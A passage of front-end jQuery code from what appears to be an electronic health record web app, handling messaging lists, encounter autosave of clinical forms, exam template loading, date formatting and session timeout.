['message-id','date','message-to','cc','subject','body','pid','patient_name']; } if (type == 'internal_outbox') { var col = ['message-id','date','message-to','cc','subject','pid','body']; } var html = ''; if (response.rows != '') { $.each(response.rows, function ( i, item ) { var obj = {}; $.each(item.cell, function ( j, val ) { obj[col[j]] = val; }); if (type == 'internal_inbox') { var label = '<h3>' + obj['message-from-label'] + '</h3><p>' + obj['subject'] + '</p>'; } else { var label = '<h3>' + obj['message-to'] + '</h3><p>' + obj['subject'] + '</p>'; } var datastring = ''; $.each(obj, function ( key, value ) { datastring += 'data-nosh-' + key + '="' + value + '" '; }); html += '<li><a href="#" class="nosh_messaging_item" ' + datastring + ' data-origin="' + type + '">' + label + '</a></li>'; }); } $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); }); } function chart_notification() { if (noshdata.group_id == '2') { $.ajax({ type: "POST", url: "ajaxchart/notification", dataType: "json", success: function(data){ if (data.appt != noshdata.notification_appt && data.appt != '') { $.jGrowl(data.appt, {sticky:true, header:data.appt_header}); noshdata.notification_appt = data.appt; } if (data.alert != noshdata.notification_alert && data.alert != '') { $.jGrowl(data.alert, {sticky:true, header:data.alert_header}); noshdata.notification_alert = data.alert; } } }); } } function openencounter() { $("#encounter_body").html(''); $("#encounter_body").empty(); if ($(".ros_dialog").hasClass('ui-dialog-content')) { $(".ros_dialog").dialog('destroy'); } if ($(".pe_dialog").hasClass('ui-dialog-content')) { $(".pe_dialog").dialog('destroy'); } $("#encounter_body").load('ajaxencounter/loadtemplate'); $('#dialog_load').dialog('option', 'title', "Loading encounter...").dialog('open'); $("#encounter_link_span").html('<a href="#" id="encounter_panel">[Active Encounter #: ' + noshdata.eid + ']</a>'); $.ajax({ type: "POST", url: "ajaxsearch/get-tags/eid/" + noshdata.eid, dataType: "json", success: function(data){ $("#encounter_tags").tagit("fill",data); } }); } function closeencounter() { var $hpi = $('#hpi_form'); console.log($hpi.length); if($hpi.length) { hpi_autosave('hpi'); } var $situation = $('#situation_form'); if($situation.length) { hpi_autosave('situation'); } var $oh = $('#oh_form'); if($oh.length) { oh_autosave(); } var $vitals = $('#vitals_form'); if($vitals.length) { vitals_autosave(); } var $proc = $('#procedure_form'); if($proc.length) { proc_autosave(); } var $assessment = $('#assessment_form'); if($assessment.length) { assessment_autosave(); } var $orders = $('#orders_form'); if($orders.length) { orders_autosave(); } var $medications = $('#mtm_medications_form'); if($medications.length) { medications_autosave(); } $.ajax({ type: "POST", url: "ajaxchart/closeencounter", success: function(data){ noshdata.encounter_active = 'n'; $("#nosh_encounter_div").hide(); $("#nosh_chart_div").show(); $("#encounter_link_span").html(''); } }); } function signedlabel (cellvalue, options, rowObject){ if (cellvalue == 'No') { return 'Draft'; } if (cellvalue == 'Yes') { return 'Signed'; } } function loadbuttons() { $(".nosh_button").button(); $(".nosh_button_save").button({icons: {primary: "ui-icon-disk"}}); $(".nosh_button_cancel").button({icons: {primary: "ui-icon-close"}}); $(".nosh_button_delete").button({icons: {primary: "ui-icon-trash"}}); $(".nosh_button_calculator").button({icons: {primary: "ui-icon-calculator"}}); $(".nosh_button_check").button({icons: {primary: "ui-icon-check"}}); $(".nosh_button_preview").button({icons: {primary: "ui-icon-comment"}}); $(".nosh_button_edit").button({icons: {primary: "ui-icon-pencil"}}); $(".nosh_button_add").button({icons: {primary: "ui-icon-plus"}}); $(".nosh_button_print").button({icons: {primary: "ui-icon-print"}}); $(".nosh_button_alert").button({icons: {primary: "ui-icon-alert"}}); $(".nosh_button_copy").button({icons: {primary: "ui-icon-copy"}}); $(".nosh_button_extlink").button({icons: {primary: "ui-icon-extlink"}}); $(".nosh_button_reactivate").button({icons: {primary: "ui-icon-arrowreturnthick-1-w"}}); $(".nosh_button_reply").button({icons: {primary: "ui-icon-arrowreturn-1-w"}}); $(".nosh_button_forward").button({icons: {primary: "ui-icon-arrow-1-e"}}); $(".nosh_button_open").button({icons: {primary: "ui-icon-folder-open"}}); $(".nosh_button_calendar").button({icons: {primary: "ui-icon-calendar"}}); $(".nosh_button_cart").button({icons: {primary: "ui-icon-cart"}}); $(".nosh_button_image").button({icons: {primary: "ui-icon-image"}}); $(".nosh_button_star").button({icons: {primary: "ui-icon-star"}}); $(".nosh_button_script").button({icons: {primary: "ui-icon-script"}}); $(".nosh_button_next").button({text: false, icons: {primary: "ui-icon-seek-next"}}); $(".nosh_button_prev").button({text: false, icons: {primary: "ui-icon-seek-prev"}}); } function swipe(){ if(supportsTouch === true){ $('.textdump').swipe({ excludedElements:'button, input, select, a, .noSwipe', tap: function(){ $(this).swipe('disable'); $(this).focus(); $(this).on('focusout', function() { $(this).swipe('enable'); }); }, swipeRight: function(){ var elem = $(this); textdump(elem); } }); $('.textdump_text').text('Swipe right'); $('#swipe').show(); } else { $('.textdump_text').text('Click shift-right arrow key'); $('#swipe').hide(); } } function menu_update(type) { $.ajax({ type: "POST", url: "ajaxchart/" + type + "-list", success: function(data){ $("#menu_accordion_" + type + "-list_content").html(data); $("#menu_accordion_" + type + "-list_load").hide(); } }); } function remove_text(parent_id_entry, a, label_text, ret) { var old = $("#" + parent_id_entry).val(); var old_arr = old.split(' '); if (label_text != '') { var new_arr = search_array(old_arr, label_text); } else { var new_arr = []; } if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, ''); old_arr[arr_index] = old_arr[arr_index].replace(label_text, ''); var old_arr1 = old_arr[arr_index].split('; ') var new_arr1 = search_array(old_arr1, a); if (new_arr1.length > 0) { var arr_index1 = old_arr1.indexOf(new_arr1[0]); old_arr1.splice(arr_index1,1); if (old_arr1.length > 0) { old_arr[arr_index] = label_text + old_arr1.join('; '); } else { old_arr.splice(arr_index,1); } } } else { var new_arr2 = search_array(old_arr, a); if (new_arr2.length > 0) { var arr_index2 = old_arr.indexOf(new_arr2[0]); old_arr.splice(arr_index2,1); } } var b = old_arr.join(" "); if (ret == true) { return b; } else { $("#" + parent_id_entry).val(b); } } function repeat_text(parent_id_entry, a, label_text) { var ret = false; var old = $("#" + parent_id_entry).val(); var old_arr = old.split(' '); if (label_text != '') { var new_arr = search_array(old_arr, label_text); } else { var new_arr = []; } if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, ''); old_arr[arr_index] = old_arr[arr_index].replace(label_text, ''); var old_arr1 = old_arr[arr_index].split('; ') var new_arr1 = search_array(old_arr1, a); if (new_arr1.length > 0) { ret = true; } } else { var new_arr2 = search_array(old_arr, a); if (new_arr2.length > 0) { ret = true; } } return ret; } function refresh_documents() { $.ajax({ type: "POST", url: "ajaxsearch/documents-count", dataType: "json", success: function(data){ jQuery("#labs").jqGrid('setCaption', 'Labs: ' + data.labs_count); jQuery("#radiology").jqGrid('setCaption', 'Imaging: ' + data.radiology_count); jQuery("#cardiopulm").jqGrid('setCaption', 'Cardiopulmonary: ' + data.cardiopulm_count); jQuery("#endoscopy").jqGrid('setCaption', 'Endoscopy: ' + data.endoscopy_count); jQuery("#referrals").jqGrid('setCaption', 'Referrals: ' + data.referrals_count); jQuery("#past_records").jqGrid('setCaption', 'Past Records: ' + data.past_records_count); jQuery("#outside_forms").jqGrid('setCaption', 'Outside Forms: ' + data.outside_forms_count); jQuery("#letters").jqGrid('setCaption', 'Letters: ' + data.letters_count); } }); } function checkorders() { $.ajax({ type: "POST", url: "ajaxencounter/check-orders", dataType: "json", success: function(data){ $('#button_orders_labs_status').html(data.labs_status); $('#button_orders_rad_status').html(data.rad_status); $('#button_orders_cp_status').html(data.cp_status); $('#button_orders_ref_status').html(data.ref_status); $('#button_orders_rx_status').html(data.rx_status); $('#button_orders_imm_status').html(data.imm_status); $('#button_orders_sup_status').html(data.sup_status); } }); } function check_oh_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-oh", dataType: "json", success: function(data){ $('#button_oh_sh_status').html(data.sh_status); $('#button_oh_etoh_status').html(data.etoh_status); $('#button_oh_tobacco_status').html(data.tobacco_status); $('#button_oh_drugs_status').html(data.drugs_status); $('#button_oh_employment_status').html(data.employment_status); $('#button_oh_meds_status').html(data.meds_status); $('#button_oh_supplements_status').html(data.supplements_status); $('#button_oh_allergies_status').html(data.allergies_status); $('#button_oh_psychosocial_status').html(data.psychosocial_status); $('#button_oh_developmental_status').html(data.developmental_status); $('#button_oh_medtrials_status').html(data.medtrials_status); } }); } function check_ros_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-ros", dataType: "json", success: function(data){ $('#button_ros_gen_status').html(data.gen); $('#button_ros_eye_status').html(data.eye); $('#button_ros_ent_status').html(data.ent); $('#button_ros_resp_status').html(data.resp); $('#button_ros_cv_status').html(data.cv); $('#button_ros_gi_status').html(data.gi); $('#button_ros_gu_status').html(data.gu); $('#button_ros_mus_status').html(data.mus); $('#button_ros_neuro_status').html(data.neuro); $('#button_ros_psych_status').html(data.psych); $('#button_ros_heme_status').html(data.heme); $('#button_ros_endocrine_status').html(data.endocrine); $('#button_ros_skin_status').html(data.skin); $('#button_ros_wcc_status').html(data.wcc); $('#button_ros_psych1_status').html(data.psych1); $('#button_ros_psych2_status').html(data.psych2); $('#button_ros_psych3_status').html(data.psych3); $('#button_ros_psych4_status').html(data.psych4); $('#button_ros_psych5_status').html(data.psych5); $('#button_ros_psych6_status').html(data.psych6); $('#button_ros_psych7_status').html(data.psych7); $('#button_ros_psych8_status').html(data.psych8); $('#button_ros_psych9_status').html(data.psych9); $('#button_ros_psych10_status').html(data.psych10); $('#button_ros_psych11_status').html(data.psych11); } }); } function check_pe_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-pe", dataType: "json", success: function(data){ $('#button_pe_gen_status').html(data.gen); $('#button_pe_eye_status').html(data.eye); $('#button_pe_ent_status').html(data.ent); $('#button_pe_neck_status').html(data.neck); $('#button_pe_resp_status').html(data.resp); $('#button_pe_cv_status').html(data.cv); $('#button_pe_ch_status').html(data.ch); $('#button_pe_gi_status').html(data.gi); $('#button_pe_gu_status').html(data.gu); $('#button_pe_lymph_status').html(data.lymph); $('#button_pe_ms_status').html(data.ms); $('#button_pe_neuro_status').html(data.neuro); $('#button_pe_psych_status').html(data.psych); $('#button_pe_skin_status').html(data.skin); $('#button_pe_constitutional_status').html(data.constitutional); $('#button_pe_mental_status').html(data.mental); } }); } function check_labs1() { $.ajax({ type: "POST", url: "ajaxencounter/check-labs", dataType: "json", success: function(data){ $('#button_labs_ua_status').html(data.ua); $('#button_labs_rapid_status').html(data.rapid); $('#button_labs_micro_status').html(data.micro); $('#button_labs_other_status').html(data.other); } }); } function total_balance() { if (noshdata.pid != '') { $.ajax({ type: "POST", url: "ajaxchart/total-balance", success: function(data){ $('#total_balance').html(data); } }); } } function hpi_autosave(type) { var old0 = $("#"+type+"_old").val(); var new0 = $("#"+type).val(); if (old0 != new0) { var str = encodeURIComponent(new0); $.ajax({ type: "POST", url: "ajaxencounter/hpi-save/" + type, data: type+'=' + str, success: function(data){ $.jGrowl(data); $("#"+type+"_old").val(new0); } }); } } function oh_autosave() { var bValid = false; $("#oh_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var oh_str = $("#oh_form").serialize(); if(oh_str){ $.ajax({ type: "POST", url: "ajaxencounter/oh-save", data: oh_str, success: function(data){ $.jGrowl(data); $("#oh_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function vitals_autosave() { var bValid = false; $("#vitals_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var vitals_str = $("#vitals_form").serialize(); if(vitals_str){ $.ajax({ type: "POST", url: "ajaxencounter/vitals-save", data: vitals_str, success: function(data){ $.jGrowl(data); $("#vitals_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function proc_autosave() { var bValid = false; $("#procedure_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var proc_str = $("#procedure_form").serialize(); if(proc_str){ $.ajax({ type: "POST", url: "ajaxencounter/proc-save", data: proc_str, success: function(data){ $.jGrowl(data); $("#procedure_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function assessment_autosave() { var bValid = false; $("#assessment_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var assessment_str = $("#assessment_form").serialize(); if(assessment_str){ $.ajax({ type: "POST", url: "ajaxencounter/assessment-save", data: assessment_str, success: function(data){ $.jGrowl(data); $("#assessment_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); $.ajax({ type: "POST", url: "ajaxencounter/get-billing", dataType: "json", success: function(data){ $("#billing_icd").removeOption(/./); $("#billing_icd").addOption(data, false); } }); } }); } else { $.jGrowl("Please complete the form"); } } } function orders_autosave() { var bValid = false; $("#orders_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var orders_str = $("#orders_form").serialize(); if(orders_str){ $.ajax({ type: "POST", url: "ajaxencounter/orders-save", data: orders_str, success: function(data){ $.jGrowl(data); $("#orders_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function medications_autosave() { $.ajax({ type: "POST", url: "ajaxencounter/oh-save1/meds", success: function(data){ $.jGrowl(data); } }); } function results_autosave() { var bValid = false; $("#oh_results_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var oh_str = $("#oh_results_form").serialize(); if(oh_str){ $.ajax({ type: "POST", url: "ajaxencounter/oh-save1/results", data: oh_str, success: function(data){ $.jGrowl(data); $("#oh_results_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function billing_autosave() { var bValid = false; $("#encounter_billing_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var billing_str = $("#encounter_billing_form").serialize(); if(billing_str){ $.ajax({ type: "POST", url: "ajaxencounter/billing-save1", data: billing_str, success: function(data){ $.jGrowl(data); $("#encounter_billing_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function pending_order_load(item) { $.ajax({ url: "ajaxchart/order-type/" + item, dataType: "json", type: "POST", success: function(data){ var label = data.label; var status = ""; var type = ""; if (label == 'messages_lab') { status = 'Details for Lab Order #' + item; type = 'lab'; } if (label == 'messages_rad') { status = 'Details for Radiology Order #' + item; type = 'rad'; } if (label == 'messages_cp') { status = 'Details for Cardiopulmonary Order #' + item; type = 'cp'; } load_outside_providers(type,'edit'); $.each(data, function(key, value){ if (key != 'label') { if (key == 'orders_pending_date') { var value = getCurrentDate(); } $("#edit_"+label+"_form :input[name='" + key + "']").val(value); } }); $("#"+label+"_status").html(status); if ($("#"+label+"_provider_list").val() == '' && noshdata.group_id == '2') { $("#"+label+"_provider_list").val(noshdata.user_id); } $("#"+label+"_edit_fields").dialog("option", "title", "Edit Lab Order"); $("#"+label+"_edit_fields").dialog('open'); } }); } function load_outside_providers(type,action) { $("#messages_"+type+"_location").removeOption(/./); var type1 = ''; var type2 = ''; if (type == 'lab') { type1 = 'Laboratory'; type2 = 'lab'; } if (type == 'rad') { type1 = 'Radiology'; type2 = 'imaging'; } if (type == 'cp') { type1 = 'Cardiopulmonary'; type2 = 'cardiopulmonary'; } $.ajax({ url: "ajaxsearch/orders-provider/" + type1, dataType: "json", type: "POST", async: false, success: function(data){ if(data.response == 'true'){ $("#messages_"+type+"_location").addOption({"":"Add "+type2+" provider."}, false); $("#messages_"+type+"_location").addOption(data.message, false); } else { $("#messages_"+type+"_location").addOption({"":"No "+type2+" provider. Click Add."}, false); } } }); $("#messages_"+type+"_provider_list").removeOption(/./); $.ajax({ url: "ajaxsearch/provider-select", dataType: "json", type: "POST", async: false, success: function(data){ $("#messages_"+type+"_provider_list").addOption({"":"Select a provider for the order."}, false); $("#messages_"+type+"_provider_list").addOption(data, false); if(action == 'add') { if (noshdata.group_id == '2') { $("#messages_"+type+"_provider_list").val(noshdata.user_id); } else { $("#messages_"+type+"_provider_list").val(''); } } } }); } function hpi_template_renew() { $("#hpi_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxencounter/hpi-template-select-list", dataType: "json", success: function(data){ $('#hpi_template').addOption({"":"*Select a template"}, false); $('#hpi_template').addOption(data.options, false); $('#hpi_template').sortOptions(); $('#hpi_template').val(""); } }); } function situation_template_renew() { $("#situation_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxencounter/situation-template-select-list", dataType: "json", success: function(data){ $('#situation_template').addOption({"":"*Select a template"}, false); $('#situation_template').addOption(data.options, false); $('#situation_template').sortOptions(); $('#situation_template').val(""); } }); } function referral_template_renew() { $("#messages_ref_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxchart/get-ref-templates-list", dataType: "json", success: function(data){ $('#messages_ref_template').addOption({"":"*Select a template"}, false); $('#messages_ref_template').addOption(data.options, false); $('#messages_ref_template').sortOptions(); } }); } function ros_form_load() { $('.ros_buttonset').buttonset(); $('.ros_detail_text').hide(); $("#ros_gu_menarche").datepicker(); $("#ros_gu_lmp").datepicker(); } function get_ros_templates(group, id, type) { $.ajax({ type: "POST", url: "ajaxencounter/get-ros-templates/" + group + "/" + id + "/" + type, dataType: "json", success: function(data){ $('#'+group+'_form').html(''); $('#'+group+'_form').dform(data); ros_form_load(); } }); } function ros_template_renew() { $.ajax({ type: "POST", url: "ajaxencounter/ros-template-select-list", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_template').removeOption(/./); $('#'+key+'_template').addOption({"":"*Select a template"}, false); $('#'+key+'_template').addOption(value, false); $('#'+key+'_template').sortOptions(); $('#'+key+'_template').val(""); }); } }); $.ajax({ type: "POST", url: "ajaxencounter/get-default-ros-templates", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_form').html(''); $('#'+key+'_form').dform(value); $("." + key + "_div").css("padding","5px"); $('.ros_template_div select').addOption({'':'Select option'},true); ros_form_load(); if (key == 'ros_wcc' && noshdata.agealldays <= 2191.44) { $.ajax({ type: "POST", url: "ajaxencounter/get-ros-wcc-template", dataType: "json", success: function(data){ $('#ros_wcc_age_form').html(''); $('#ros_wcc_age_form').dform(data); ros_form_load(); } }); } }); $('#dialog_load').dialog('close'); } }); } function ros_get_data() { $.ajax({ type: "POST", url: "ajaxencounter/get-ros", dataType: "json", success: function(data){ if (data && data != '') { $.each(data, function(key, value){ if (key != 'eid' || key != 'pid' || key != 'ros_date' || key != 'encounter_provider') { $('#'+key).val(value); $('#'+key+'_old').val(value); } }); } } }); } function ros_dialog_open() { if ($('#ros_skin_form').is(':empty')) { $('#dialog_load').dialog('option', 'title', "Loading templates...").dialog('open'); ros_template_renew(); } ros_get_data(); } function pe_form_load() { $('.pe_buttonset').buttonset(); $('.pe_detail_text').hide(); } function get_pe_templates(group, id, type) { $.ajax({ type: "POST", url: "ajaxencounter/get-pe-templates/" + group + "/" + id + "/" + type, dataType: "json", success: function(data){ $('#'+group+'_form').html(''); $('#'+group+'_form').dform(data); pe_form_load(); } }); } function pe_accordion_action(id, dialog_id) { $("#" + id + " .text").first().focus(); $("#"+dialog_id).find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); } function pe_template_renew() { $.ajax({ type: "POST", url: "ajaxencounter/pe-template-select-list", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_template').removeOption(/./); $('#'+key+'_template').addOption({"":"*Select a template"}, false); $('#'+key+'_template').addOption(value, false); $('#'+key+'_template').sortOptions(); $('#'+key+'_template').val(""); }); } }); $.ajax({ type: "POST", url: "ajaxencounter/get-default-pe-templates", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_form').html(''); $('#'+key+'_form').dform(value); $("." + key + "_div").css("padding","5px"); $('.pe_template_div select').addOption({'':'Select option'},true); pe_form_load(); }); $('#dialog_load').dialog('close'); } }); } function pe_get_data() { $.ajax({ type: "POST", url: "ajaxencounter/get-pe", dataType: "json", success: function(data){ if (data && data != '') { $.each(data, function(key, value){ if (key != 'eid' || key != 'pid' || key != 'pe_date' || key != 'encounter_provider') { $('#'+key).val(value); $('#'+key+'_old').val(value); if (!!value) { $('#' + key + '_h').html(noshdata.item_present); } else { $('#' + key + '_h').html(noshdata.item_empty); } } }); } } }); } function pe_dialog_open() { var bValid = false; $('.pe_dialog').each(function() { var dialog_id = $(this).attr('id'); var accordion_id = dialog_id.replace('_dialog', '_accordion'); if (!$("#"+accordion_id).hasClass('ui-accordion')) { $("#"+accordion_id).accordion({ create: function(event, ui) { var id = ui.panel[0].id; pe_accordion_action(id, dialog_id); }, activate: function(event, ui) { var id = ui.newPanel[0].id; pe_accordion_action(id, dialog_id); }, heightStyle: "content" }); bValid = true; } }); if (bValid == true) { $('#dialog_load').dialog('option', 'title', "Loading templates...").dialog('open'); pe_template_renew(); } pe_get_data(); } function pe_dialog_open1() { $('.pe_dialog').each(function() { var dialog_id = $(this).attr('id'); var accordion_id = dialog_id.replace('_dialog', '_accordion'); if (!$("#"+accordion_id).hasClass('ui-accordion')) { $("#"+accordion_id).accordion({ create: function(event, ui) { var id = ui.panel[0].id; pe_accordion_action(id, dialog_id); }, activate: function(event, ui) { var id = ui.newPanel[0].id; pe_accordion_action(id, dialog_id); }, heightStyle: "content" }); } }); pe_get_data(); } function parse_date(string) { var date = new Date(); var parts = String(string).split(/[- :]/); date.setFullYear(parts[0]); date.setMonth(parts[1] - 1); date.setDate(parts[2]); date.setHours(parts[3]); date.setMinutes(parts[4]); date.setSeconds(parts[5]); date.setMilliseconds(0); return date; } function parse_date1(string) { var date = new Date(); var parts = String(string).split("/"); date.setFullYear(parts[2]); date.setMonth(parts[0] - 1); date.setDate(parts[1]); date.setHours(0); date.setMinutes(0); date.setSeconds(0); date.setMilliseconds(0); return date; } function editDate(string) { var result = string.split("-"); var edit_date = result[1] + '/' + result[2] + '/' + result[0]; return edit_date; } function editDate1(string) { var result1 = string.split(" "); var result = result1[0].split("-"); var edit_date = result[1] + '/' + result[2] + '/' + result[0]; if (edit_date == '00/00/0000') { var edit_date1 = ''; } else { var edit_date1 = edit_date; } return edit_date1; } function editDate2(string) { var result1 = string.split(" "); var result = result1[1].split(":"); var hour1 = result[0]; var hour2 = parseInt(hour1); if (hour2 > 12) { var hour3 = hour2 - 12; var hour4 = hour3 + ''; var pm = 'PM'; if (hour4.length == 1) { var hour = "0" + hour4; } else { var hour = hour4; } } else { if (hour2 == 0) { var hour = '12'; var pm = 'AM'; } if (hour2 == 12) { var hour = hour2; var pm = 'PM'; } if (hour2 < 12) { var pm = 'AM'; if (hour2.length == 1) { var hour = "0" + hour2; } else { var hour = hour2; } } } var minute1 = result[1]; var minute2 = minute1 + ''; if (minute2.length == 1) { var minute = "0" + minute2; } else { var minute = minute2; } var time = hour + ":" + minute + ' ' + pm; return time; } function getCurrentDate() { var d = new Date(); var day1 = d.getDate(); var day2 = day1 + ''; if (day2.length == 1) { var day = "0" + day2; } else { var day = day2; } var month1 = d.getMonth(); var month2 = parseInt(month1); var month3 = month2 + 1; var month4 = month3 + ''; if (month4.length == 1) { var month = "0" + month4; } else { var month = month4; } var date = month + "/" + day + "/" + d.getFullYear(); return date; } function getCurrentTime() { var d = new Date(); var hour1 = d.getHours(); var hour2 = parseInt(hour1); if (hour2 > 12) { var hour3 = hour2 - 12; var hour4 = hour3 + ''; var pm = 'PM'; if (hour4.length == 1) { var hour = "0" + hour4; } else { var hour = hour4; } } else { if (hour2 == 0) { var hour = '12'; var pm = 'AM'; } if (hour2 == 12) { var hour = hour2; var pm = 'PM'; } if (hour2 < 12) { var pm = 'AM'; if (hour2.length == 1) { var hour = "0" + hour2; } else { var hour = hour2; } } } var minute1 = d.getMinutes(); var minute2 = minute1 + ''; if (minute2.length == 1) { var minute = "0" + minute2; } else { var minute = minute2; } var time = hour + ":" + minute + ' ' + pm; return time; } function typelabel (cellvalue, options, rowObject){ if (cellvalue == 'standardmedical') { return 'Standard Medical Visit V1'; } if (cellvalue == 'standardmedical1') { return 'Standard Medical Visit V2'; } if (cellvalue == 'clinicalsupport') { return 'Clinical Support Visit'; } if (cellvalue == 'standardpsych') { return 'Annual Psychiatric Evaluation'; } if (cellvalue == 'standardpsych1') { return 'Psychiatric Encounter'; } if (cellvalue == 'standardmtm') { return 'MTM Encounter'; } } function t_messages_tags() { var id = $("#t_messages_id").val(); $.ajax({ type: "POST", url: "ajaxsearch/get-tags/t_messages_id/" + id, dataType: "json", success: function(data){ $(".t_messages_tags").tagit("fill",data); } }); } function refresh_timeline() { var $timeline_block = $('.cd-timeline-block'); //hide timeline blocks which are outside the viewport $timeline_block.each(function(){ if($(this).offset().top > $(window).scrollTop()+$(window).height()*0.75) { $(this).find('.cd-timeline-img, .cd-timeline-content').hide(); } }); //on scolling, show/animate timeline blocks when enter the viewport $(window).on('scroll', function(){ $timeline_block.each(function(){ if( $(this).offset().top <= $(window).scrollTop()+$(window).height()*0.75 && $(this).find('.cd-timeline-img').is(":hidden")) { $(this).find('.cd-timeline-img, .cd-timeline-content').show("slide"); } }); }); } $.fn.clearForm = function() { return this.each(function() { var type = this.type, tag = this.tagName.toLowerCase(); if (tag == 'form') { return $(':input',this).clearForm(); } if (type == 'text' || type == 'password' || type == 'hidden' || tag == 'textarea') { this.value = ''; $(this).removeClass("ui-state-error"); } else if (type == 'checkbox' || type == 'radio') { this.checked = false; $(this).removeClass("ui-state-error"); $(this).checkboxradio('refresh'); } else if (tag == 'select') { this.selectedIndex = 0; $(this).removeClass("ui-state-error"); $(this).selectmenu('refresh'); } }); }; $.fn.clearDiv = function() { return this.each(function() { var type = this.type, tag = this.tagName.toLowerCase(); if (tag == 'div') { return $(':input',this).clearForm(); } if (type == 'text' || type == 'password' || type == 'hidden' || tag == 'textarea') { this.value = ''; $(this).removeClass("ui-state-error"); } else if (type == 'checkbox' || type == 'radio') { this.checked = false; $(this).removeClass("ui-state-error"); $(this).checkboxradio('refresh'); } else if (tag == 'select') { this.selectedIndex = 0; $(this).removeClass("ui-state-error"); $(this).selectmenu('refresh'); } }); }; $.fn.serializeJSON = function() { var o = {}; var a = this.serializeArray(); $.each(a, function() { if (o[this.name] !== undefined) { if (!o[this.name].push) { o[this.name] = [o[this.name]]; } o[this.name].push(this.value || ''); } else { o[this.name] = this.value || ''; } }); return o; }; $.widget( "custom.catcomplete", $.ui.autocomplete, { _renderMenu: function( ul, items ) { var that = this, currentCategory = ""; $.each( items, function( index, item ) { if ( item.category != currentCategory ) { ul.append( "<li class='ui-autocomplete-category'>" + item.category + "</li>" ); currentCategory = item.category; } that._renderItemData( ul, item ); }); } }); $.ajaxSetup({ headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); } }); $(document).ajaxError(function(event,xhr,options,exc) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } }); $(document).idleTimeout({ inactivity: 3600000, noconfirm: 10000, alive_url: noshdata.error, redirect_url: noshdata.logout_url, logout_url: noshdata.logout_url, sessionAlive: false }); $(document).ready(function() { if ($("#provider_schedule1").length) { open_schedule(); } $('.cd-read-more').css('color', '#000000'); if ($('#internal_inbox').length) { open_messaging('internal_inbox'); } $(".headericon").offset({top: 23}); $(".headericon1").offset({top: 7}); if ($('.template_class').length) { var width = $('.template_class').width(); $('.template_class').wrap('<div class="template_class_wrap" style="position:relative;width:100%"></div>'); $('.template_class_wrap').append('<i class="template_click zmdi zmdi-favorite zmdi-hc-lg" style="position:absolute;right:5px;top:5px;width:30px;color:red;"></i>'); } //refresh_timeline(); //$('.js').show(); //loadbuttons(); //$(".nosh_tooltip").tooltip(); //$(".phonemask").mask("(999) 999-9999"); //$("#dialog_load").dialog({ //height: 100, //autoOpen: false, //closeOnEscape: false, //dialogClass: "noclose", //modal: true //}); //var tz = jstz.determine(); //$.cookie('nosh_tz', tz.name(), { path: '/' }); //$('.textdump').swipe({ //swipeRight: function(){ //var elem = $(this); //textdump(elem); //} //}); //$("#textdump_group").dialog({ //bgiframe: true, //autoOpen: false, //height: 300, //width: 400, //draggable: 